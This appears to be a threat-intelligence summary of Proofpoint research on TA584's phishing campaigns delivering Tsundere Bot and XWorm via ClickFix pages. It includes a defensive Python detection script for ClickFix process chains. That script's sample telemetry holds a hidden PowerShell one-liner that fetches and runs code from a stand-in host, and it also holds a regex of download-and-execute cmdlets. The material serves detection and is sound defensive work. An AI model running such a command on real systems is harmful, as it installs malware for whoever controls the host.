An initial access broker known as TA584 is using the Tsundere Bot alongside the XWorm remote access trojan in email-based campaigns, and its campaign volume tripled in late 2025 compared with Q1 2025.
KEY FACTS
- Actor: TA584, an initial access broker
- Malware: Tsundere Bot and XWorm
- Technique: phishing emails with unique URLs, geofencing, redirect chains, CAPTCHA and PowerShell
- Trend: campaign volume tripled in late 2025
In a technical analysis, Proofpoint researchers said, with high confidence, that Tsundere Bot infections could lead to ransomware and that TA584 has been active since 2020, tripling its campaign volume in late 2025 while expanding targets to Germany, other European countries and Australia.
The campaign begins with emails sent from hundreds of compromised aged accounts and delivered via SendGrid and Amazon Simple Email Service. Messages carry unique URLs, apply geofencing and IP filtering, and use redirect chains often involving traffic direction systems such as Keitaro.
Targets that pass the filters reach a CAPTCHA page and then a ClickFix page instructing the recipient to run a PowerShell command. The command fetches and runs an obfuscated script that loads XWorm or Tsundere Bot into memory and then redirects the browser to a benign site.
Tsundere Bot requires Node.js, which the malware installs using installers generated from its command and control (C2) panel. It retrieves its C2 address from the Ethereum blockchain using an EtherHiding variant and includes a hardcoded fallback, communicates over WebSockets, checks the system locale to avoid CIS languages, can execute arbitrary JavaScript, collect system information and use hosts as SOCKS proxies, and offers a built-in market for bots.
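A defender-side starting point for the chain described above, written as an added example rather than code from the Proofpoint report: it scans constructed Sysmon-style process-creation records for a PowerShell process launched from explorer.exe (the Run box a ClickFix page asks the user to paste into) with download-and-execute syntax, then ties any node.exe running from a user-writable directory back to that PowerShell through the parent-PID chain. The field names, file paths, PIDs and the example.invalid URL are all constructed.

```python
import re

# Constructed Sysmon Event ID 1 style records; not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1832, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmd": "explorer.exe"},
    {"pid": 5210, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify).Content"'},
    {"pid": 5388, "ppid": 5210, "image": r"C:\Users\alice\AppData\Local\Temp\node.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "node.exe loader.js"},
    {"pid": 6001, "ppid": 2200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\agent.exe", "cmd": "powershell -File C:\\scripts\\inventory.ps1"},
]

# Download-and-execute cmdlets/aliases typical of a ClickFix one-liner (assumed indicator list).
DOWNLOAD_EXEC = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|frombase64string)\b", re.I)
# Directories a loader can write to without admin rights; a packaged Node.js install would not live here.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|ProgramData)\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_powershell(ev):
    """PowerShell spawned by explorer.exe (Win+R / Run box) whose command line fetches and runs code."""
    return (basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and basename(ev["parent"]) == "explorer.exe"
            and bool(DOWNLOAD_EXEC.search(ev["cmd"])))


def is_suspicious_node(ev):
    """node.exe executing from a user-writable path, i.e. Node.js dropped by a loader."""
    return basename(ev["image"]) == "node.exe" and bool(USER_WRITABLE.search(ev["image"]))


def find_clickfix_chains(events, max_hops=4):
    """Map each flagged PowerShell PID to the suspicious node.exe PIDs found beneath it.

    The ancestor walk tolerates intermediate processes (cmd.exe, an installer) between the two.
    A flagged PowerShell with an empty list is still reported: the same chain can load XWorm in
    memory without ever starting Node.js. PID reuse is not handled; real telemetry needs GUIDs.
    """
    by_pid = {e["pid"]: e for e in events}
    chains = {e["pid"]: [] for e in events if is_clickfix_powershell(e)}
    for ev in events:
        if not is_suspicious_node(ev):
            continue
        cur, hops = by_pid.get(ev["ppid"]), 0
        while cur is not None and hops < max_hops:
            if cur["pid"] in chains:
                chains[cur["pid"]].append(ev["pid"])
                break
            cur, hops = by_pid.get(cur["ppid"]), hops + 1
    return chains
```

Running `find_clickfix_chains(SAMPLE_EVENTS)` on the constructed records pairs PowerShell PID 5210 with node.exe PID 5388 and ignores the vendor agent's scheduled PowerShell script.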
WHY IT MATTERS
The shift to Tsundere Bot and memory-only loaders increases the range of post-compromise options, including data gathering and lateral movement. The described email chain and in-memory execution steps make detection and static signature-based defenses more difficult.